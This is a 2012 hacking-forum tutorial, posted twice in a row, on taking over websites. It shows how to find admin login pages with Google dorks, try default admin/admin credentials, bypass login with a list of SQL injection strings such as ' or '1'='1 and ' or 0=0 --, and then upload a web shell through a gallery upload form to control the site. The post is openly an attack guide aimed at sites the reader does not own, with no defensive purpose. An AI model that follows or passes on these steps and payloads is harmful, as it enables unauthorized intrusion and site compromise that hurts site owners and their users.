]
09-11-2012, 12:24 PM
So Let's Start with simple Instructions.
What we Need Simple or Advance sql injection vulnerable Website eg.www.example.com/admin/adminlogin.asp
So Let's start With Tutourial.
1.We need to find Sql vulnerable website.
Like using your smartsense and playing with Google.
That is called google hacking
so how to use google hacking. Everyone Know about google dorks.
So use simple google dorks.
eg. inurl:adminlogin.asp or php or aspx
inurl:admin/adminlogin.aspx or php or asp
![[Image: sql1.png]](http://s19.postimage.org/u0og7ylmb/sql1.png)
You Can find these dorks On google Type "GHDB"
(google Hacking Database)
2.After you finding a website then you want to hack it or gain admin access So how to do it.
Here is same thing your smartsense.
First of fall use simple thing
Username:admin
password:admin
if it is not working then use sql queries that is in simple codes.
That sql queries is used by database like 'or''='
0=0 if 0/=0 then 1=1
something like that.
username:admin
password:'or''='
So here Is some sql Queries that is maily used.
'or''='
' or'1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
3.Now after that you have Admin Access.
After entering in Website You Want to find like gallery links or something that is add category like that.
![[Image: sql3.png]](http://s19.postimage.org/58ou0q4fn/sql3.png)
4.So Find the option of upload.
5.Select file. Select your shell here then upload it.
Everything is done now you want to find it.
Go to Website eg.www.example.com
![[Image: sql6.png]](http://s19.postimage.org/7raj1eq5v/sql6.png)
find your category or gallery link open it in gallery there is images showing.
Enjoy The Shell uploading. And do anything with Website what you Want..
Thanks for reading..
:headbash::cool::dance::wacko::yawn::sad::epic:[/color][/b]
What we Need Simple or Advance sql injection vulnerable Website eg.www.example.com/admin/adminlogin.asp
So Let's start With Tutourial.
1.We need to find Sql vulnerable website.
Like using your smartsense and playing with Google.
That is called google hacking
so how to use google hacking. Everyone Know about google dorks.
So use simple google dorks.
eg. inurl:adminlogin.asp or php or aspx
inurl:admin/adminlogin.aspx or php or asp
You Can find these dorks On google Type "GHDB"
(google Hacking Database)
2.After you finding a website then you want to hack it or gain admin access So how to do it.
Here is same thing your smartsense.
First of fall use simple thing
Username:admin
password:admin
if it is not working then use sql queries that is in simple codes.
That sql queries is used by database like 'or''='
0=0 if 0/=0 then 1=1
something like that.
username:admin
password:'or''='
So here Is some sql Queries that is maily used.
'or''='
' or'1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
3.Now after that you have Admin Access.
After entering in Website You Want to find like gallery links or something that is add category like that.
4.So Find the option of upload.
5.Select file. Select your shell here then upload it.
Everything is done now you want to find it.
Go to Website eg.www.example.com
find your category or gallery link open it in gallery there is images showing.
Enjoy The Shell uploading. And do anything with Website what you Want..
Thanks for reading..
:headbash::cool::dance::wacko::yawn::sad::epic:[/color][/b]
